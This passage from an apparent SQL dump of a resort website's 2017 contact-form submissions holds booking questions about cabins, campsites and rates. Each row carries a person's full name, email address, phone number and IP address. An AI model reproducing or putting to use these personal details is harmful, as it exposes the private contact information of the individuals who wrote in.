adults &amp; 2 children (4 &amp; 7).   Do you have anything available?   Thanks!',19,'2017-03-21 20:20:20','173.215.47.228'),(115,10,'2','David Conway',20,'2017-03-30 01:58:34','47.203.137.20'),(116,10,'4','dbc@expcom.com',20,'2017-03-30 01:58:34','47.203.137.20'),(117,10,'7','203 5265573',20,'2017-03-30 01:58:34','47.203.137.20'),(118,10,'24','Other',20,'2017-03-30 01:58:34','47.203.137.20'),(119,10,'22','updates to site',20,'2017-03-30 01:58:34','47.203.137.20'),(120,10,'23','I checked in to the site and did a number of updates. See that you have been getting a few bookings through the site.',20,'2017-03-30 01:58:34','47.203.137.20'),(121,10,'2','Martin Jonas',21,'2017-03-30 03:35:18','174.74.5.134'),(122,10,'4','jonasfour@cox.net',21,'2017-03-30 03:35:18','174.74.5.134'),(123,10,'7','402 9169556',21,'2017-03-30 03:35:18','174.74.5.134'),(124,10,'24','Existing Reservation',21,'2017-03-30 03:35:18','174.74.5.134'),(125,10,'22','Dates',21,'2017-03-30 03:35:18','174.74.5.134'),(126,10,'23','Hey guys, hope all is well.  I am just checking on what date the Jonas group has this year.  Please let me know.  Thanks\r\nMartin',21,'2017-03-30 03:35:18','174.74.5.134'),(127,10,'2','Jeremy Ohm',22,'2017-04-13 01:36:43','24.220.242.185'),(128,10,'4','ohm_28@hotmail.com',22,'2017-04-13 01:36:43','24.220.242.185'),(129,10,'7','320 3041963',22,'2017-04-13 01:36:43','24.220.242.185'),(130,10,'24','New Reservation',22,'2017-04-13 01:36:43','24.220.242.185'),(131,10,'22','Availability ',22,'2017-04-13 01:36:43','24.220.242.185'),(132,10,'23','Just curious if you had any cabins open the weekend of july 14? Also a camper site that weekend also? \r\nThanks,\r\nJeremy ',22,'2017-04-13 01:36:43','24.220.242.185'),(133,10,'2','Kris Raaen',23,'2017-04-15 00:51:48','172.58.83.174'),(134,10,'4','raaenkk@hotmail.com',23,'2017-04-15 00:51:48','172.58.83.174'),(135,10,'7',' ',23,'2017-04-15 00:51:48','172.58.83.174'),(136,10,'24','Questions about our resort',23,'2017-04-15 00:51:48','172.58.83.174'),(137,10,'22','bedding',23,'2017-04-15 00:51:48','172.58.83.174'),(138,10,'23','Hi,\r\nWe have rented a cabin in June and we are wondering if you supply bedding and towels? Also, is there a place for a campfire? Do we bring our own charcoal briskets? ',23,'2017-04-15 00:51:48','172.58.83.174'),(139,10,'2','Marilyn Kellen',24,'2017-04-19 19:03:47','184.101.232.212'),(140,10,'4','dmkellen@farmerstel.net',24,'2017-04-19 19:03:47','184.101.232.212'),(141,10,'7','320 2125453',24,'2017-04-19 19:03:47','184.101.232.212'),(142,10,'24','Questions about our resort',24,'2017-04-19 19:03:47','184.101.232.212'),(143,10,'22','cabins',24,'2017-04-19 19:03:47','184.101.232.212'),(144,10,'23','Do you have any 1 bedroom cabins available for the 2nd and 3rd week of June.  Also, the rate.  Uncle coming from Florida to fish.  Thank you',24,'2017-04-19 19:03:47','184.101.232.212'),(145,10,'2','Marilyn Kellen',25,'2017-04-19 19:03:53','184.101.232.212'),(146,10,'4','dmkellen@farmerstel.net',25,'2017-04-19 19:03:53','184.101.232.212'),(147,10,'7','320 2125453',25,'2017-04-19 19:03:53','184.101.232.212'),(148,10,'24','Questions about our resort',25,'2017-04-19 19:03:53','184.101.232.212'),(149,10,'22','cabins',25,'2017-04-19 19:03:53','184.101.232.212'),(150,10,'23','Do you have any 1 bedroom cabins available for the 2nd and 3rd week of June.  Also, the rate.  Uncle coming from Florida to fish.  Thank you',25,'2017-04-19 19:03:53','184.101.232.212'),(151,10,'2','Marilyn Kellen',26,'2017-04-19 19:03:58','184.101.232.212'),(152,10,'4','dmkellen@farmerstel.net',26,'2017-04-19 19:03:58','184.101.232.212'),(153,10,'7','320 2125453',26,'2017-04-19 19:03:58','184.101.232.212'),(154,10,'24','Questions about our resort',26,'2017-04-19 19:03:58','184.101.232.212'),(155,10,'22','cabins',26,'2017-04-19 19:03:58','184.101.232.212'),(156,10,'23','Do you have any 1 bedroom cabins available for the 2nd and 3rd week of June.  Also, the rate.  Uncle coming from Florida to fish.  Thank you',26,'2017-04-19 19:03:58','184.101.232.212'),(157,10,'2','Marilyn Kellen',27,'2017-04-19 19:04:04','184.101.232.212'),(158,10,'4','dmkellen@farmerstel.net',27,'2017-04-19 19:04:04','184.101.232.212'),(159,10,'7','320 2125453',27,'2017-04-19 19:04:04','184.101.232.212'),(160,10,'24','Questions about our resort',27,'2017-04-19 19:04:04','184.101.232.212'),(161,10,'22','cabins',27,'2017-04-19 19:04:04','184.101.232.212'),(162,10,'23','Do you have any 1 bedroom cabins available for the 2nd and 3rd week of June.  Also, the rate.  Uncle coming from Florida to fish.  Thank you',27,'2017-04-19 19:04:04','184.101.232.212'),(163,10,'2','Marilyn Kellen',28,'2017-04-19 19:04:09','184.101.232.212'),(164,10,'4','dmkellen@farmerstel.net',28,'2017-04-19 19:04:09','184.101.232.212'),(165,10,'7','320 2125453',28,'2017-04-19 19:04:09','184.101.232.212'),(166,10,'24','Questions about our resort',28,'2017-04-19 19:04:09','184.101.232.212'),(167,10,'22','cabins',28,'2017-04-19 19:04:09','184.101.232.212'),(168,10,'23','Do you have any 1 bedroom cabins available for the 2nd and 3rd week of June.  Also, the rate.  Uncle coming from Florida to fish.  Thank you',28,'2017-04-19 19:04:09','184.101.232.212'),(169,10,'2','Marilyn Kellen',29,'2017-04-19 19:04:15','184.101.232.212'),(170,10,'4','dmkellen@farmerstel.net',29,'2017-04-19 19:04:15','184.101.232.212'),(171,10,'7','320 2125453',29,'2017-04-19 19:04:15','184.101.232.212'),(172,10,'24','Questions about our resort',29,'2017-04-19 19:04:15','184.101.232.212'),(173,10,'22','cabins',29,'2017-04-19 19:04:15','184.101.232.212'),(174,10,'23','Do you have any 1 bedroom cabins available for the 2nd and 3rd week of June.  Also, the rate.  Uncle coming from Florida to fish.  Thank you',29,'2017-04-19 19:04:15','184.101.232.212'),(175,10,'2','Marilyn Kellen',30,'2017-04-19 19:04:20','184.101.232.212'),(176,10,'4','dmkellen@farmerstel.net',30,'2017-04-19 19:04:20','184.101.232.212'),(177,10,'7','320 2125453',30,'2017-04-19 19:04:20','184.101.232.212'),(178,10,'24','Questions about our resort',30,'2017-04-19 19:04:20','184.101.232.212'),(179,10,'22','cabins',30,'2017-04-19 19:04:20','184.101.232.212'),(180,10,'23','Do you have any 1 bedroom cabins available for the 2nd and 3rd week of June.  Also, the rate.  Uncle coming from Florida to fish.  Thank you',30,'2017-04-19 19:04:20','184.101.232.212'),(181,10,'2','Chad Hirman',31,'2017-04-27 20:14:06','173.160.121.61'),(182,10,'4','chadhirmans@gmail.com',31,'2017-04-27 20:14:06','173.160.121.61'),(183,10,'7','612 3845052',31,'2017-04-27 20:14:06','173.160.121.61'),(184,10,'24','New Reservation',31,'2017-04-27 20:14:06','173.160.121.61'),(185,10,'22','Do you have openings?',31,'2017-04-27 20:14:06','173.160.121.61'),(186,10,'23','Do you have an opening for a 14&#039; pop-up trailer for the weekend if 5/19-5/21?  Thanks in advance. ',31,'2017-04-27 20:14:06','173.160.121.61'),(187,10,'2','Susan L Opsahl',32,'2017-05-01 19:42:04','71.195.13.7'),(188,10,'4','sopsahl@comcast.net',32,'2017-05-01 19:42:04','71.195.13.7'),(189,10,'7','952 9419856',32,'2017-05-01 19:42:04','71.195.13.7'),(190,10,'24','Existing Reservation',32,'2017-05-01 19:42:04','71.195.13.7'),(191,10,'22','confirmation number',32,'2017-05-01 19:42:04','71.195.13.7'),(192,10,'23','Hi, I had made a reservation earlier this afternoon. Is a confirmation number? I had forgotten to ask for it.',32,'2017-05-01 19:42:04','71.195.13.7'),(193,10,'2','Stephanie Wright',33,'2017-05-07 20:44:25','173.214.239.245'),(194,10,'4','swright@csicable.net',33,'2017-05-07 20:44:25','173.214.239.245'),(195,10,'7','701 3689932',33,'2017-05-07 20:44:25','173.214.239.245'),(196,10,'24','New Reservation',33,'2017-05-07 20:44:25','173.214.239.245'),(197,10,'22','full rv hookup camping',33,'2017-05-07 20:44:25','173.214.239.245'),(198,10,'23','Hi - Do you have two full hookup rv sites for August 3,4 &amp; 5? \r\nThanks, Steph',33,'2017-05-07 20:44:25','173.214.239.245'),(199,10,'2','Shawna Burrow',34,'2017-05-20 00:01:48','50.80.217.16'),(200,10,'4','Shawnaburrow@hotmail.com',34,'2017-05-20 00:01:48','50.80.217.16'),(201,10,'7','563 5701488',34,'2017-05-20 00:01:48','50.80.217.16'),(202,10,'24','New Reservation',34,'2017-05-20 00:01:48','50.80.217.16'),(203,10,'22','Cabin',34,'2017-05-20 00:01:48','50.80.217.16'),(204,10,'23','I\\&#039;m looking to get some cabin and kitchenette rates for the week before and including Labor Day weekend. August 30-September 4',34,'2017-05-20 00:01:48','50.80.217.16'),(205,10,'2','Shawna Burrow',35,'2017-05-20 00:01:53','50.80.217.16'),(206,10,'4','Shawnaburrow@hotmail.com',35,'2017-05-20 00:01:53','50.80.217.16'),(207,10,'7','563 5701488',35,'2017-05-20 00:01:53','50.80.217.16'),(208,10,'24','New Reservation',35,'2017-05-20 00:01:53','50.80.217.16'),(209,10,'22','Cabin',35,'2017-05-20 00:01:53','50.80.217.16'),(210,10,'23','I\\&#039;m looking to get some cabin and kitchenette rates for the week before and including Labor Day weekend. August 30-September 4',35,'2017-05-20 00:01:53','50.80.217.16'),(211,10,'2','Angie Christians',36,'2017-05-24 18:59:53','66.242.87.62'),(212,10,'4','angiechristians@hotmail.com',36,'2017-05-24 18:59:53','66.242.87.62'),(213,10,'7',' ',36,'2017-05-24 18:59:53','66.242.87.62'),(214,10,'24','New Reservation',36,'2017-05-24 18:59:53','66.242.87.62'),(215,10,'22','July 28-30',36,'2017-05-24 18:59:53','66.242.87.62'),(216,10,'23','I am looking for 3 campsites the last weekend of July. If possible, we might do a long weekend either the 27-30 or 28-31. Please let me know if you have anything available. \r\n\r\nThanks!',36,'2017-05-24 18:59:53','66.242.87.62'),(217,10,'2','Angie Christians',37,'2017-05-24 19:00:01','66.242.87.62'),(218,10,'4','angiechristians@hotmail.com',37,'2017-05-24 19:00:01','66.242.87.62'),(219,10,'7',' ',37,'2017-05-24 19:00:01','66.242.87.62'),(220,10,'24','New Reservation',37,'2017-05-24 19:00:01','66.242.87.62'),(221,10,'22','July 28-30',37,'2017-05-24 19:00:01','66.242.87.62'),(222,10,'23','I am looking for 3 campsites the last weekend of July. If possible, we might do a long weekend either the 27-30 or 28-31. Please let me know if you have anything available. \r\n\r\nThanks!',37,'2017-05-24 19:00:01','66.242.87.62'),(223,10,'2','Jinhyung Kim',38,'2017-05-28 02:10:10','73.183.69.5'),(224,10,'4','jinkimc@gmail.com',38,'2017-05-28 02:10:10','73.183.69.5'),(225,10,'7',' ',38,'2017-05-28 02:10:10','73.183.69.5'),(226,10,'24','New Reservation',38,'2017-05-28 02:10:10','73.183.69.5'),(227,10,'22','Reservation',38,'2017-05-28 02:10:10','73.183.69.5'),(228,10,'23','Finding a motel room for an adult and a kid with a small kitchen',38,'2017-05-28 02:10:10','73.183.69.5'),(229,10,'2','Tiffany ',39,'2017-05-30 01:34:11','174.74.10.13'),(230,10,'4','Tiffany.benash@yahoo.com',39,'2017-05-30 01:34:11','174.74.10.13'),(231,10,'7',' ',39,'2017-05-30 01:34:11','174.74.10.13'),(232,10,'24','New Reservation',39,'2017-05-30 01:34:11','174.74.10.13'),(233,10,'22','RAtes',39,'2017-05-30 01:34:11','174.74.10.13'),(234,10,'23','Can you please give me rates for a 4-6 person cabin. Do you allowe pets?',39,'2017-05-30 01:34:11','174.74.10.13'),(235,10,'2','Patti Isaacson',40,'2017-05-31 00:50:45','69.34.51.162'),(236,10,'4','patriciai@welcomehmc.com',40,'2017-05-31 00:50:45','69.34.51.162'),(237,10,'7','320 2675367',40,'2017-05-31 00:50:45','69.34.51.162'),(238,10,'24','Other',40,'2017-05-31 00:50:45','69.34.51.162'),(239,10,'22','Options',40,'2017-05-31 00:50:45','69.34.51.162'),(240,10,'23','Hello Mike and Diane...\r\nThe boys and I are excited to join everyone this year in Ashby. \r\nI found a place near me that rents campers and I am wondering if there is a site available from the 7th to 11th? It would be a pop up style camper and I would prefer to have water but would not be an issue if there is not one. I wanted to see if this was an option?\r\nPlease let me know either way and we will decide from there.\r\nThank you',40,'2017-05-31 00:50:45','69.34.51.162'),(241,10,'2','Amanda Kingzett',41,'2017-06-01 12:48:53','162.96.9.37'),(242,10,'4','super_k15@hotmail.com',41,'2017-06-01 12:48:53','162.96.9.37'),(243,10,'7','651 3011623',41,'2017-06-01 12:48:53','162.96.9.37'),(244,10,'24','Questions about our resort',41,'2017-06-01 12:48:53','162.96.9.37'),(245,10,'22','availability tonight',41,'2017-06-01 12:48:53','162.96.9.37'),(246,10,'23','Do you have anything available for tonight for 2 people with 2 dogs? Just one night. If not, do you allow day visitors at the resort? Do you allow dogs to play in the water? Thanks',41,'2017-06-01 12:48:53','162.96.9.37'),(247,10,'2','Amanda Stotesbery ',42,'2017-06-05 03:52:45','207.190.102.139'),(248,10,'4','a_stotesbery2@hotmail.com',42,'2017-06-05 03:52:45','207.190.102.139'),(249,10,'7',' ',42,'2017-06-05 03:52:45','207.190.102.139'),(250,10,'24','(Select a Topic)',42,'2017-06-05 03:52:45','207.190.102.139'),(251,10,'22','Availability ',42,'2017-06-05 03:52:45','207.190.102.139'),(252,10,'23','My family of 5 is looking for a cabin to rent starting Thursday, July 27th to Sunday, July 30th. Any details on availability &amp; cost would be greatly appreciated!\r\n\r\nThanks,\r\nAmanda',42,'2017-06-05 03:52:45','207.190.102.139'),(253,10,'2','Joe Absey',43,'2017-06-10 11:16:52','66.191.76.10'),(254,10,'4','lazyaire@gmail.com',43,'2017-06-10 11:16:52','66.191.76.10'),(255,10,'7','612 4659563',43,'2017-06-10 11:16:52','66.191.76.10'),(256,10,'24','Other',43,'2017-06-10 11:16:52','66.191.76.10'),(257,10,'22','Inflatable Hammocks/loungers wholesale',43,'2017-06-10 11:16:52','66.191.76.10'),(258,10,'23','We\\&#039;re in your area for the Fergus Falls Summerfest &amp; have additional units available for wholesale purchase. Please feel free to visit our website at https://www.lazyaire.com &amp; contact us if you are interested in reselling at your resort. We currently have units starting at just $15/pc. w/ minimum order quantity of 10 pcs.',43,'2017-06-10 11:16:52','66.191.76.10'),(259,10,'2','Nancy Lines',44,'2017-06-11 15:51:20','71.34.213.63'),(260,10,'4','silvergeode@msn.com',44,'2017-06-11 15:51:20','71.34.213.63'),(261,10,'7',' ',44,'2017-06-11 15:51:20','71.34.213.63'),(262,10,'24','New Reservation',44,'2017-06-11 15:51:20','71.34.213.63'),(263,10,'22','cabin availability',44,'2017-06-11 15:51:20','71.34.213.63'),(264,10,'23','would like to rent one of your cabins for the night of Aug. 26th  will be there for my brother\\\\\\&#039;s wedding. ',44,'2017-06-11 15:51:20','71.34.213.63'),(265,10,'2','Brian Johnson',45,'2017-06-13 12:25:23','24.183.128.232'),(266,10,'4','merrytoonz@hotmail.com',45,'2017-06-13 12:25:23','24.183.128.232'),(267,10,'7','218 2051072',45,'2017-06-13 12:25:23','24.183.128.232'),(268,10,'24','New Reservation',45,'2017-06-13 12:25:23','24.183.128.232'),(269,10,'22','June 16-17',45,'2017-06-13 12:25:23','24.183.128.232'),(270,10,'23','Hi looking to see if you have any available sites for this weekend.  We have a popup. Thx',45,'2017-06-13 12:25:23','24.183.128.232'),(271,10,'2','Beth',46,'2017-06-20 19:30:16','63.155.244.141'),(272,10,'4','bethturchin@hotmail.com',46,'2017-06-20 19:30:16','63.155.244.141'),(273,10,'7','218 7310608',46,'2017-06-20 19:30:16','63.155.244.141'),(274,10,'24','New Reservation',46,'2017-06-20 19:30:16','63.155.244.141'),(275,10,'22','Opening??',46,'2017-06-20 19:30:16','63.155.244.141'),(276,10,'23','Do you have any openings for a camper with electric and water on july 14 and 15th?\r\nThe camper is about 30 ft long. Thanks!',46,'2017-06-20 19:30:16','63.155.244.141'),(277,10,'2','Kristi',47,'2017-06-22 13:43:54','64.90.86.78'),(278,10,'4','crocker@uslink.net',47,'2017-06-22 13:43:54','64.90.86.78'),(279,10,'7',' ',47,'2017-06-22 13:43:54','64.90.86.78'),(280,10,'24','Questions about our resort',47,'2017-06-22 13:43:54','64.90.86.78'),(281,10,'22','Availability',47,'2017-06-22 13:43:54','64.90.86.78'),(282,10,'23','Wondering if you have anything available for 10 people the week of Aug 5th through the 12th or close to those dates?',47,'2017-06-22 13:43:54','64.90.86.78'),(283,10,'2','annik.fc.adam@gmail.com',48,'2017-06-26 18:30:36','216.81.12.22'),(284,10,'4','annik.fc.adam@gmail.com',48,'2017-06-26 18:30:36','216.81.12.22'),(285,10,'7','204 6477200',48,'2017-06-26 18:30:36','216.81.12.22'),(286,10,'24','Existing Reservation',48,'2017-06-26 18:30:36','216.81.12.22'),(287,10,'22','Confirmation please for Aug 10th to 12th',48,'2017-06-26 18:30:36','216.81.12.22'),(288,10,'23','Hello,\r\n\r\nI made a reservation over the phone for August 10 -12th. While we confirmed this over the phone, I was hoping we could receive a confirmation over email. We are cycling with two little ones from Fergus Falls and I would feel much better having a written confirmation. \r\n\r\nThank you,\r\n\r\nAnnik Adam',48,'2017-06-26 18:30:36','216.81.12.22'),(289,10,'2','Marilynn Beyer',49,'2017-06-27 01:38:09','63.155.238.108'),(290,10,'4','mkbeyer_@hotmail.com',49,'2017-06-27 01:38:09','63.155.238.108'),(291,10,'7','218 7364306',49,'2017-06-27 01:38:09','63.155.238.108'),(292,10,'24','New Reservation',49,'2017-06-27 01:38:09','63.155.238.108'),(293,10,'22','want to camp',49,'2017-06-27 01:38:09','63.155.238.108'),(294,10,'23','Want to camp with an RV starting on June 28th,29th,30 &amp; July 1 just the morning. Leaving the 1 st.',49,'2017-06-27 01:38:09','63.155.238.108'),(295,10,'2','McKayla ',50,'2017-07-08 03:02:56','216.188.199.197'),(296,10,'4','mckayla1.blitz@gmail.com',50,'2017-07-08 03:02:56','216.188.199.197'),(297,10,'7','320 5523690',50,'2017-07-08 03:02:56','216.188.199.197'),(298,10,'24','New Reservation',50,'2017-07-08 03:02:56','216.188.199.197'),(299,10,'22','trying to book a site',50,'2017-07-08 03:02:56','216.188.199.197'),(300,10,'23','I would like to check on availability for an electrical tent site from July 21-23 but I am having trouble with the calendar.',50,'2017-07-08 03:02:56','216.188.199.197'),(301,10,'2','Brandon Schaffer',51,'2017-07-08 21:47:51','74.221.172.212'),(302,10,'4','korn_man55@yahoo.com',51,'2017-07-08 21:47:51','74.221.172.212'),(303,10,'7','307 7518137',51,'2017-07-08 21:47:51','74.221.172.212'),(304,10,'24','New Reservation',51,'2017-07-08 21:47:51','74.221.172.212'),(305,10,'22','This week',51,'2017-07-08 21:47:51','74.221.172.212'),(306,10,'23','Hi there,\r\n\r\nMy name is Brandon Schaffer.  My family is thinking of camping at your resort on July 11th.  We are biking on the trail and wanted to see if you had anything available for a regular tent site this Tuesday night.  Thanks',51,'2017-07-08 21:47:51','74.221.172.212'),(307,10,'2','Melissa wiebold',52,'2017-07-10 19:37:51','66.188.164.101'),(308,10,'4','vwiebold@charter.net',52,'2017-07-10 19:37:51','66.188.164.101'),(309,10,'7','320 3283',52,'2017-07-10 19:37:51','66.188.164.101'),(310,10,'24','Questions about our resort',52,'2017-07-10 19:37:51','66.188.164.101'),(311,10,'22','Openings',52,'2017-07-10 19:37:51','66.188.164.101'),(312,10,'23','Just wondering if you have openings Aug 3,4,5 for rv camping',52,'2017-07-10 19:37:51','66.188.164.101'),(313,10,'2','Linda Swanson',53,'2017-07-12 03:01:54','71.220.46.187'),(314,10,'4','lindaanddavidswanson@hotmail.com',53,'2017-07-12 03:01:54','71.220.46.187'),(315,10,'7','651 6748252',53,'2017-07-12 03:01:54','71.220.46.187'),(316,10,'24','New Reservation',53,'2017-07-12 03:01:54','71.220.46.187'),(317,10,'22','Campsite',53,'2017-07-12 03:01:54','71.220.46.187'),(318,10,'23','Do you have a campsite with full hook-ups  available for July 21 - 23?',53,'2017-07-12 03:01:54','71.220.46.187'),(319,10,'2','Linda Swanson',54,'2017-07-12 03:02:03','71.220.46.187'),(320,10,'4','lindaanddavidswanson@hotmail.com',54,'2017-07-12 03:02:03','71.220.46.187'),(321,10,'7','651 6748252',54,'2017-07-12 03:02:03','71.220.46.187'),(322,10,'24','New Reservation',54,'2017-07-12 03:02:03','71.220.46.187'),(323,10,'22','Campsite',54,'2017-07-12 03:02:03','71.220.46.187'),(324,10,'23','Do you have a campsite with full hook-ups  available for July 21 - 23?',54,'2017-07-12 03:02:03','71.220.46.187'),(325,10,'2','ROBYN BYERS',55,'2017-07-17 16:30:54','129.176.151.14'),(326,10,'4','byers.robyn@mayo.edu',55,'2017-07-17 16:30:54','129.176.151.14'),(327,10,'7','507 4382013',55,'2017-07-17 16:30:54','129.176.151.14'),(328,10,'24','New Reservation',55,'2017-07-17 16:30:54','129.176.151.14'),(329,10,'22','Motel',55,'2017-07-17 16:30:54','129.176.151.14'),(330,10,'23','Hi we will be there the week off July 22 - July29\r\nAre there any motel rooms open at the time?\r\nHave any of the cabins opened up for our daughter Ashley?? \r\nThanks Mark and Robyn Byers',55,'2017-07-17 16:30:54','129.176.151.14'),(331,10,'2','ROBYN BYERS',56,'2017-07-17 16:31:03','129.176.151.14'),(332,10,'4','byers.robyn@mayo.edu',56,'2017-07-17 16:31:03','129.176.151.14'),(333,10,'7','507 4382013',56,'2017-07-17 16:31:03','129.176.151.14'),(334,10,'24','New Reservation',56,'2017-07-17 16:31:03','129.176.151.14'),(335,10,'22','Motel',56,'2017-07-17 16:31:03','129.176.151.14'),(336,10,'23','Hi we will be there the week off July 22 - July29\r\nAre there any motel rooms open at the time?\r\nHave any of the cabins opened up for our daughter Ashley?? \r\nThanks Mark and Robyn Byers',56,'2017-07-17 16:31:03','129.176.151.14'),(337,10,'2','ROBYN BYERS',57,'2017-07-17 16:31:12','129.176.151.14'),(338,10,'4','byers.robyn@mayo.edu',57,'2017-07-17 16:31:12','129.176.151.14'),(339,10,'7','507 4382013',57,'2017-07-17 16:31:12','129.176.151.14'),(340,10,'24','New Reservation',57,'2017-07-17 16:31:12','129.176.151.14'),(341,10,'22','Motel',57,'2017-07-17 16:31:12','129.176.151.14'),(342,10,'23','Hi we will be there the week off July 22 - July29\r\nAre there any motel rooms open at the time?\r\nHave any of the cabins opened up for our daughter Ashley?? \r\nThanks Mark and Robyn Byers',57,'2017-07-17 16:31:12','129.176.151.14'),(343,10,'2','ROBYN BYERS',58,'2017-07-17 16:31:22','129.176.151.14'),(344,10,'4','byers.robyn@mayo.edu',58,'2017-07-17 16:31:22','129.176.151.14'),(345,10,'7','507 4382013',58,'2017-07-17 16:31:22','129.176.151.14'),(346,10,'24','New Reservation',58,'2017-07-17 16:31:22','129.176.151.14'),(347,10,'22','Motel',58,'2017-07-17 16:31:22','129.176.151.14'),(348,10,'23','Hi we will be there the week off July 22 - July29\r\nAre there any motel rooms open at the time?\r\nHave any of the cabins opened up for our daughter Ashley?? \r\nThanks Mark and Robyn Byers',58,'2017-07-17 16:31:22','129.176.151.14'),(349,10,'2','ROBYN BYERS',59,'2017-07-17 16:31:31','129.176.151.18'),(350,10,'4','byers.robyn@mayo.edu',59,'2017-07-17 16:31:31','129.176.151.18'),(351,10,'7','507 4382013',59,'2017-07-17 16:31:31','129.176.151.18'),(352,10,'24','New Reservation',59,'2017-07-17 16:31:31','129.176.151.18'),(353,10,'22','Motel',59,'2017-07-17 16:31:31','129.176.151.18'),(354,10,'23','Hi we will be there the week off July 22 - July29\r\nAre there any motel rooms open at the time?\r\nHave any of the cabins opened up for our daughter Ashley?? \r\nThanks Mark and Robyn Byers',59,'2017-07-17 16:31:31','129.176.151.18'),(355,10,'2','Jamie Menne',60,'2017-07-18 20:13:07','68.47.16.121'),(356,10,'4','Tjmenne13@gmail.com',60,'2017-07-18 20:13:07','68.47.16.121'),(357,10,'7','952 2201993',60,'2017-07-18 20:13:07','68.47.16.121'),(358,10,'24','New Reservation',60,'2017-07-18 20:13:07','68.47.16.121'),(359,10,'22','Summer 2018',60,'2017-07-18 20:13:07','68.47.16.121'),(360,10,'23','I\\&#039;m inquiring about making a reservation for next August 2018.  Specifically August 2-5, 2018. It is for a family vacation and we would need two camp sites, two pop up camper sites with electrical hook up and one cabin (for 2 people). Would you be able to accommodate us?\r\n\r\nThanks,\r\nJamie',60,'2017-07-18 20:13:07','68.47.16.121'),(361,10,'2','Amy Biniek',61,'2017-07-18 21:20:16','97.88.22.75'),(362,10,'4','gregandamysfamily@gmail.com',61,'2017-07-18 21:20:16','97.88.22.75'),(363,10,'7',' ',61,'2017-07-18 21:20:16','97.88.22.75'),(364,10,'24','(Select a Topic)',61,'2017-07-18 21:20:16','97.88.22.75'),(365,10,'22','seasonal',61,'2017-07-18 21:20:16','97.88.22.75'),(366,10,'23','Hi!  Do you have any seasonal spots currently available?  If so, can you tell me how close they are located to the water and the price?  Do you know if you have any open coming up next year?  Do you allow boat lifts?  Thanks!',61,'2017-07-18 21:20:16','97.88.22.75'),(367,10,'2','Cheryl Severtson',62,'2017-08-01 00:12:12','140.186.215.132'),(368,10,'4','severtson54@yahoo.com',62,'2017-08-01 00:12:12','140.186.215.132'),(369,10,'7','605 3542745',62,'2017-08-01 00:12:12','140.186.215.132'),(370,10,'24','Questions about our resort',62,'2017-08-01 00:12:12','140.186.215.132'),(371,10,'22','Grills',62,'2017-08-01 00:12:12','140.186.215.132'),(372,10,'23','We have cabins 11 and 12 and I was wondering if they have grills and what type.  Do the cabins have a place for a camp fire?',62,'2017-08-01 00:12:12','140.186.215.132'),(373,10,'2','Kim Czeh',63,'2017-08-05 14:40:35','184.157.213.203'),(374,10,'4','kimczeh@gmail.com',63,'2017-08-05 14:40:35','184.157.213.203'),(375,10,'7','218 2421261',63,'2017-08-05 14:40:35','184.157.213.203'),(376,10,'24','New Reservation',63,'2017-08-05 14:40:35','184.157.213.203'),(377,10,'22','Larger group',63,'2017-08-05 14:40:35','184.157.213.203'),(378,10,'23','Hi, we have a larger group that has an annual camping trip that has spanned over 50 years.  We look for a combination of campsites and cabins.  We could use 4-5 cabins and 7-10 campsites.  We usually have a long weekend.  We are looking at Thursday, Jul 26-Monday, July 30, 2018.  Is this something your resort would be able to accomodate.',63,'2017-08-05 14:40:35','184.157.213.203'),(379,10,'2','Wendy Hesse',64,'2017-08-22 16:53:43','71.39.99.177'),(380,10,'4','wendyh@roundbank.com',64,'2017-08-22 16:53:43','71.39.99.177'),(381,10,'7','952 4612772',64,'2017-08-22 16:53:43','71.39.99.177'),(382,10,'24','Existing Reservation',64,'2017-08-22 16:53:43','71.39.99.177'),(383,10,'22','Linens/towels/construction',64,'2017-08-22 16:53:43','71.39.99.177'),(384,10,'23','Good afternoon\r\nI was wondering if we need to bring our own linens and towels, what is provided in the cabins? Also I heard there is a lot of construction in that area right now, is there an easy way to get to your place? we will be coming from the south metro area.\r\nThank you\r\nWendy',64,'2017-08-22 16:53:43','71.39.99.177'),(385,10,'2','Fran Adams',65,'2017-08-31 22:12:36','98.127.8.17'),(386,10,'4','edandfran.org@gmail.com',65,'2017-08-31 22:12:36','98.127.8.17'),(387,10,'7','970 2403139',65,'2017-08-31 22:12:36','98.127.8.17'),(388,10,'24','Questions about our resort',65,'2017-08-31 22:12:36','98.127.8.17'),(389,10,'22','cyclist rates',65,'2017-08-31 22:12:36','98.127.8.17'),(390,10,'23','Hello\r\nI saw on a review that you have cyclist rates.  What are they?  Do we need to make a reservation for the 2nd 1/2 of Sept?',65,'2017-08-31 22:12:36','98.127.8.17'),(391,10,'2','Fran Adams',66,'2017-08-31 22:12:49','98.127.8.17'),(392,10,'4','edandfran.org@gmail.com',66,'2017-08-31 22:12:49','98.127.8.17'),(393,10,'7','970 2403139',66,'2017-08-31 22:12:49','98.127.8.17'),(394,10,'24','Questions about our resort',66,'2017-08-31 22:12:49','98.127.8.17'),(395,10,'22','cyclist rates',66,'2017-08-31 22:12:49','98.127.8.17'),(396,10,'23','Hello\r\nI saw on a review that you have cyclist rates.  What are they?  Do we need to make a reservation for the 2nd 1/2 of Sept?',66,'2017-08-31 22:12:49','98.127.8.17'),(397,10,'2','Fran Adams',67,'2017-08-31 22:12:58','98.127.8.17'),(398,10,'4','edandfran.org@gmail.com',67,'2017-08-31 22:12:58','98.127.8.17'),(399,10,'7','970 2403139',67,'2017-08-31 22:12:58','98.127.8.17'),(400,10,'24','Questions about our resort',67,'2017-08-31 22:12:58','98.127.8.17'),(401,10,'22','cyclist rates',67,'2017-08-31 22:12:58','98.127.8.17'),(402,10,'23','Hello\r\nI saw on a review that you have cyclist rates.  What are they?  Do we need to make a reservation for the 2nd 1/2 of Sept?',67,'2017-08-31 22:12:58','98.127.8.17'),(403,10,'2','Fran Adams',68,'2017-08-31 22:13:08','98.127.8.17'),(404,10,'4','edandfran.org@gmail.com',68,'2017-08-31 22:13:08','98.127.8.17'),(405,10,'7','970 2403139',68,'2017-08-31 22:13:08','98.127.8.17'),(406,10,'24','Questions about our resort',68,'2017-08-31 22:13:08','98.127.8.17'),(407,10,'22','cyclist rates',68,'2017-08-31 22:13:08','98.127.8.17'),(408,10,'23','Hello\r\nI saw on a review that you have cyclist rates.  What are they?  Do we need to make a reservation for the 2nd 1/2 of Sept?',68,'2017-08-31 22:13:08','98.127.8.17'),(409,10,'2','Fran Adams',69,'2017-08-31 22:13:17','98.127.8.17'),(410,10,'4','edandfran.org@gmail.com',69,'2017-08-31 22:13:17','98.127.8.17'),(411,10,'7','970 2403139',69,'2017-08-31 22:13:17','98.127.8.17'),(412,10,'24','Questions about our resort',69,'2017-08-31 22:13:17','98.127.8.17'),(413,10,'22','cyclist rates',69,'2017-08-31 